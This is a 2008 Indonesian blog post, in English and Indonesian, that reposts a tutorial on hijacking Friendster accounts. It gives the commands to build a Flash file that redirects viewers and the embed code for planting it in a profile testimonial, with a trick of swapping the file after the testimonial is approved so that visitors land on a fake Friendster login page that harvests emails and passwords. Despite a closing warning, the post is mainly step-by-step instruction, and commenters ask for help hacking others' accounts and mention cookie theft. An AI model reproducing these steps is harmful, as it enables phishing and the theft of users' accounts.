• Update

    Selamat datang di atlantisku.com. Dapatkan panduan, tips dan trik seputar komputer, smartphone, internet dan gadget.


    16 Mei 2008

    Friendster Hacking

    English

    Do you have an account and often visit Friendster? If yes so be careful from now. Friendster is a social networking site services which has a very large number of members in the world.
    However, if you yearn for this site has the grip of security that can be used by hackers to steal your account? The following article will explain how a hacker using engineering techniques to steal username and password Friendster, which I quoted from the blog chaidir.wordpress.com.

    Techniques used to redirect a profile of Friendster is using a flash. Now I want to give me an example of how we redirect Friendster profile URL to someone who we want. First we create a simple script, such as flash code below. To use Linux, install the Ming package first. Ming is a library that can generate the Macromedia Flash file (. Swf). If you use Ubuntu and not to install, run the following command:

    apt-get install libming-util



    If Ming successfully installed, create a file with your editor, which contains the following code and save with the name flash.as:

    etURL ( "http://www.example.com");

    for instance as follows:

    getURL ( "http://chaidir.wordpress.com");

    After a flash file (. Swf) by running the following command:

    chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as



    If successful, it will produce a file called Flash out.swf. This file when accessed from the browser will redirect me to a URL that we defined previously. For example, please access the flash that I have made here. When you access the url, then you direct 'directed' towards http://chaidir.wordpress.com.

    Then, upload the files was a flash (out.swf) to a place that is easily accessible. For example, in http://numpang.com/out.swf. After that, send a testimonial to the people who want to give testimonials in the flash file with this.

    And then enter the following code:



    <object classid=’clsid:D27CDB6E-AE6D-11cf-96B8-444553540000′ codebase=’http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0′ width=’400′ height=’250′><param name=’movie’ value=’http://numpang.com/out.swf‘ /><param name=’quality’ value=’high’ /><embed src=’http://numpang.com/out.swf‘ quality=’high’ pluginspage=’http://www.macromedia.com/go/getflashplayer’ type=’application/x-shockwave-flash’ width=’400′ height=’250′ allowScriptAccess=”never”></embed></object>



    To try if this successfully testimonials, click preview. So that the recipient can receive testimonials, delete the file and replace the flash (http://numpang.com/out.swf) with a flash animation that attract attention. For example, with a flash of Babaflash Forum. After the new Constitution, replace and switch again (upload again) with a flash file.

    Now, in the example of Friendster in false cases, the cracker redirect every user who wants to see the profile that was already get flash and direct to http://www.friendster.co.nr. Pick to win there and created a page that resembles the login page and Friendster seems to happen every error that requires the user to enter email and password.

    Facilities to submit a testimonial on Friendster cracker is used to
    deceptive people who often play with Friendster. Therefore, be careful of testimonials that use flash. If testimonail get from people who are not known or even a flash that important, better not to open it.

    Photo credit: thor.info


    Bahasa

    Apakah kamu punya account dan sering mengunjungi Friendster? Jika ya maka berhati-hatilah mulai dari sekarang. Friendster merupakan situs layanan jejaring sosial (social networking) yang mempunyai jumlah anggota sangat besar termasuk di Indonesia. Indonesia menempati posisi ke-3 setelah Filipina dan Malaysia. Dengan member yang sangat besar ini pihak Friendster pun meluncurkan situsnya dalam Bahasa Indonesia. Hal ini sungguh menggembirakan bagi para pengguna Friendster di Indonesia.
    Namun tahukah kamu jika situs ini mempunyai celah keamanan yang dapat digunakan oleh para hacker untuk mencuri account kamu? Berikut artikel bagaimana seorang hacker menggunakan teknik rekayasa untuk mencuri username dan password pengguna Friendster yang saya kutip dari blog chaidir.wordpress.com.

    Teknik yang digunakan untuk me-redirect suatu profile dari Friendster adalah dengan menggunakan flash. Sekarang saya ingin memberikan contoh bagaimana kita me-redirect profile Friendster seseorang menuju URL yang kita inginkan. Pertama kita buat script flash sederhana seperti kode dibawah ini. Untuk yang menggunakan linux, install Ming package terlebih dahulu. Ming adalah library yang dapat menghasilkan file Macromedia Flash (.swf). Jika anda menggunakan ubuntu dan belum menginstall, jalankan perintah berikut :

    apt-get install libming-util

    Jika Ming berhasil diinstal, buat sebuah file dengan editor anda yang berisi kode berikut dan simpan dengan nama flash.as :

    getURL("http://www.contoh.com");

    misalkan seperti berikut :

    getURL("http://chaidir.wordpress.com");

    Setelah itu buat file flash (.swf) dengan menjalankan perintah berikut :


    chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as

    Jika berhasil, maka akan dihasilkan file Flash bernama out.swf. File ini ketika diakses dari browser, akan me-redirect ke URL yang kita definisikan sebelumnya. Contohnya silahkan akses flash yang telah saya buat disini. Apabila anda mengakses url tersebut, maka anda langsung ‘diarahkan’ menuju http://chaidir.wordpress.com.

    Selanjutnya upload file flash tadi (out.swf) ke tempat yang mudah diakses. Misalkan di http://numpang.com/out.swf. Setelah itu, kirim testimonial ke orang yang ingin di berikan testimonial dengan memasukkan file flash ini.

    Caranya masukkan kode berikut :




    <object classid=’clsid:D27CDB6E-AE6D-11cf-96B8-444553540000′ codebase=’http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0′ width=’400′ height=’250′><param name=’movie’ value=’http://numpang.com/out.swf‘ /><param name=’quality’ value=’high’ /><embed src=’http://numpang.com/out.swf‘ quality=’high’ pluginspage=’http://www.macromedia.com/go/getflashplayer’ type=’application/x-shockwave-flash’ width=’400′ height=’250′ allowScriptAccess=”never”></embed></object>


    Untuk mencoba apakah testimonial ini berhasil, klik priview. Agar sang penerima testimonial bisa meng-approve testimonial, hapus ganti file flash tadi terlebih dahulu (http://numpang.com/out.swf) dengan flash animasi yang menarik perhatian. Misalnya dengan flash dari Babaflash Forum. Baru setelah di approve, aktifkan ganti lagi (upload lagi) dengan file flash tadi.

    Nah, dalam contoh kasus di Friendster palsu, sang cracker me-redirect setiap user yang ingin melihat profile yang sudah disusupi flash tadi dan mengarahkannya ke http://www.friendster.co.nr. Dan celakanya disitu dibuat halaman yang menyerupai halaman login Friendster dan seolah-olah terjadi kesalahan yang mengharuskan setiap user memasukkan email dan passwordnya.

    Fasilitas untuk mengirimkan testimonial di Friendster inilah yang dimanfaatkan cracker untuk ‘mengelabuhi’ orang-orang yang sering bermain-main dengan Friendster. Oleh karena itu, berhati-hatilah terhadap testimonial yang menggunakan flash. Jika mendapatkan testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash yang ngga penting, lebih baik tidak usah di approve aja.

    Kredit foto: thor.info

    Baca juga:


    31 komentar:

    1. Komentar ini telah dihapus oleh administrator blog.

      BalasHapus
    2. Tips nya bagus, sekarang saya mohon dibantu untuk mengembalikan account friendster saya karena telah disabotase orang, dan permohonan telah saya e-mailkan dan berikan testi yang bersih dari kode hack tapi sampai sekarang "penjahat" fs tersebut tidak memberikan account saya. Mohon bantuan karena bookaddress teman saya semua ada disana. Ada yang bisa bantu.

      BalasHapus
    3. Nice tutorial....

      BalasHapus
    4. Anonim12.48

      arrrgggghhhh,.,.,.,
      bertele-tele amit. ribed bozz.,
      sederhanain aja napa.,

      BalasHapus
    5. Anonim13.08

      kalo ga pake linux gimana?
      mesti install apa dulu

      BalasHapus
    6. Anonim13.18

      trus gmana caranya ngembali'in friendster yang udah di ambil alih sama orang??
      kirim jawabannya ke santara_prada@yahoo.co.id ya...

      pliz cpet!!

      BalasHapus
    7. Cara paling cepat dan mudah utk mengembalikan akun friendster yang sudah di ambil alih orang lain adl dengan mengirim email ke pihak friendster utk memintanya kembali. Tentunya kamu harus menyediakan data valid yg seusai pd waktu pertama kali mendaftar. Jika data kamu setelah diverifikasi dan valid maka Friendster akan mengirimkan email lama kamu sbg username dan password baru. Ubahlah password itu dengan kombinasi huruf dan angka agar tdk mudah di bobol orang lain.

      BalasHapus
    8. Anonim12.19

      yg gampang aja ada ga sih?

      BalasHapus
    9. Anonim14.17

      daripada mikirin hacking yang bikin pala puyeng mending kalian ett fs gw :p

      gerieri@yahoo.co.id

      BalasHapus
    10. Anonim15.49

      Komentar ini telah dihapus oleh administrator blog.

      BalasHapus
    11. Anonim19.08

      bisa gga balikin acoount fs sya?
      nama acc nya chiby myl . email nya uda d ubah sama hacker itu .
      tlg ya.ksi tau ak ya email d chiby_myl@yahoo.com .
      soal na gga tau lgy musti gmn.. ='(

      BalasHapus
    12. freak_lez01.35

      wah hack friendster marak lagi nih...
      cara balikin friendster ya..??
      waduh kaga ngarti dah gua...

      1.yang jelas pasti minta tolong sama pihak friendster melalui jalur contactnya... help@friendster.com
      dia yang bikin masa kaga bisa ngembaliin seperti semula sih :P

      2.nah yang kedua ini nih yang paling utama..
      lo berdoa sama yang kuasa.. jangan lupa shalat istikhoroh dan minta petunjuknya...

      3.god bless u all..

      BalasHapus
    13. Anonim07.41

      Komentar ini telah dihapus oleh administrator blog.

      BalasHapus
    14. Anonim17.40

      kaka ya baik :) ajarin saya dong cara meng-hack ini.. saya ingin mengembalikan profil teman saya yg dirusak parah oleh orang tak bertanggung jawab..damapknya,samapi sekarang,teman saya itu malu,dikira dia memang memasang foto primary yg "aneh"..kalau kk bersedia membantu, kirim kan ke email saya ya kak : lind_weasley@yahoo.com

      trims banyak kak sbelumnya..

      ngomong2 itu buku ciptaan kk?
      didoakan selalu sukse ya kak :)

      BalasHapus
    15. hacking friendster bsa melalui metode al: fake login & stealing cookies.

      klo utk liat photo di private profile bisa gunain web ini http://atum-re.biz/fs

      BalasHapus
    16. Anonim22.57

      ada yang punya cara gak untuk mengembalikan friendster yang sudah di ambil orang...
      tolong donk....

      BalasHapus
    17. Anonim07.32

      hehehehe... copas dari blog sebelah die...

      BalasHapus
    18. Anonim18.32

      Tolong bantu saya...
      Friendster saya juga di hack dengan orang.
      Teman-teman semasa SMA dan kuliah banyak di sana.
      Teman2 bantu saya untuk mengembalikan friendster saya.

      Email : balin48@yahoo.com
      Ini sudah termasuk username friendster saya.

      Untuk teman2 yg mau bantu, saya sangat berterima kasih sekali.

      BalasHapus
    19. Anonim08.41

      mas tolong hackingin fs dengan nama yui yoshioka(singer jepang). cz dy sombong mas, g mw diajak temenan. thx so much, ato tlg dikirim caranya ke anjaoye@yahoo.com trima kasih banyak mas

      BalasHapus
    20. Mas.. ajarin aku bikin eph...esh... donk...

      BalasHapus
    21. Kata adik akuh,,yang suka maenan PRENSTER Sich yang penting:

      1.ga nerima Coment sembarangan
      2.Jangan ada poto Pripat (cz bikin pnasaran hacker)
      3.Jangan samakan alamat FS & emailnya
      4.buatlah pasword Fs yang kuat (hurup+angka+tanda)
      5.Bikin FS Cadangan (kaya lagu T2 aje..hehe)
      6.simpen alamat EP-ES Tmen2 kita..(rajin yah..)
      7.Nanti kalo tau2 ke http://www.friendster.co.nr
      jangan di teruskan... di back aja..

      nah mungkin sedikit tips lah.. buat yang blum tw aja..
      EP-ES Aku juga di crack.. eh taunya Adiku sendiri yang nge crack.. wah,,, sungguh teerrrllaaluuuu...

      dia bilang gini:
      " Hare gene maen FS??...Facebook donk...!!!"

      Waduwh...maluu aku sebagai kha-kha..
      bisanya cuma maen sega... sedangkan adeku mah PS 3.

      Hiksss...hiksss..hiks...

      BalasHapus
    22. Anonim00.14

      ming tu apa???
      gw dah liat buku nya n cd nya?? banyak bgt cara nya!!!
      tp bgs seh.. msh bisa cara nya hack fs cara cookies ya???
      diee

      BalasHapus
    23. Anonim12.37

      permisi,,,
      bLh minta tLng gx yaCH,,
      hmm,,,nich gw tuch pengen bgt bLJr nge hack jaU(jiaCh ni cew mO ikutan jdi hackeR,,,wkwkwkw)
      cumaN,,bs gx yaCH kLo ksh gw keterangaN yg mudah dikit aZa,,,
      he he he,,gx makSud ama ket di atas,,,aGk dikiT mit rUmit,,he he he,,
      hhmm,,,,kLo bLh sich,,tLng hub emaiL/Ym gw yach,,

      thank's so much sbLm & sesudachnya(hhmmmmm)

      gwc3w3xj3l3x_jgnd3k4t@yahoo.co.id(emaiL)

      gwc3w3xj3l3x_jgnd3k3t(YM...sama aZa kLi,,,hue,,)

      se kaLi Lgi,,,trima kasiH,,,

      ttd,,

      yg pengen taU jua,,,

      BalasHapus
    24. Anonim18.47

      waduuuuuuuuwh..
      beribet bange! simple kan please...

      BalasHapus
    25. Herdy01.01

      Hehehe....iya rumit amat, ada ga teknik yg lebih cepat dan ga ribet??? Coz msh newbie sih :D

      BalasHapus
    26. tutorial ini sudah lumayan lama....dan memang sangat bagus....

      @For All....

      pingin belajar hacking Fs...???

      yah emang kudu ribet...bro....

      BalasHapus
    27. Tolong sangat Dunk bisa ga hacK fs Saya Cuz distu fotonya diganti ma foto yg adUh ... parah bgd dEyh ...

      pliss2 mslhnya tuh fs di private jd saya ga bsa msk ksana ...

      plizz
      reply ke email saya y di agelitz@yahoo.com

      makasih bgd2...

      BalasHapus
    28. Anonim09.40

      bukanya embed code itu ga bisa masuk comment ya?

      BalasHapus
    29. Anonim10.15

      kk bisa bantu ajarin cara buat calender ma
      jam swf yang bagus klo bisa kirim ke email aq ya ka junker.z@telkom.net

      BalasHapus
    30. Anonim08.23

      Mw Nanya NicH...

      TucH FRiendster HackinGx Msih bsa ap ga....?

      MaksUdx msih Jlan Ap Gak Hackingx....

      Kan FS skrang uDah Di maintence......

      ThX...... :)

      BalasHapus
    31. Anonim17.23

      windows adakah??

      BalasHapus

    No Spam, No Sara, No Offensif, No Promosi, No Live Link!